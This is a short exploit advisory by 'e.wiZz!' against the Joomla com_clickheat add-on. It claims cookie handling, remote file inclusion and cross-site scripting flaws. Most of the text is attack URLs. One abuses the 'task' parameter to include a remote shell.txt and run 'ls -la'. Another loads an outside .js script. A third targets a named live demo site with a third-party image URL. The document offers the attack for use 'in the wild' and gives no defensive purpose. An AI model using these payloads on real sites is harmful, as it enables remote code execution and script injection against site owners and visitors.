**********************Joomla Component com_clickheat Multiple vulnerabilities***********************

By:   e.wiZz!
Site:  madspot.org
Info: bosnian ftw!



In the wild.....

**************************************************************************************************************************************
******Info:  Clickheat is an add-on for Joomla, which primary goal is to "visualize" clicks made on the pages of your website. Upon collecting enough information, Clickheat displays a heatmap of most clicked areas, coloring them from blue (rare clicks) to yellow ("hottest area"). 

*****Site:  recly.com

*****Demo: http://www.recly.com/demo/joomla2/index.php?from_mod=true&tmpl=component&option=com_clickheat




*******************************COOKIE HANDLING VULNERABILITY************(from .jpg)**************************************

http://<INTHEWILD>/<INSTALL-PATH>/index.php?option=com_ clickheat&task=http://sitewithevil.JPG

http://www.recly.com/demo/joomla2/index.php?from_mod=true&tmpl=component&option=com_clickheat&task=open_heatmap&page=http://www.planetnana.co.il/mycoolpictures123/fake/lt2.jpg

******************************************************RFI*********************************************************************************
if magic_quotes_off

http://<INTHEWILD>/<INSTALL-PATH>/index.php?option=com_ clickheat&task=http://shell.txt?cmd=ls -la


************XSS**************

http://<INTHEWILD>/<INSTALL-PATH>/index.php?option=com_ clickheat&task=http://somewhere.js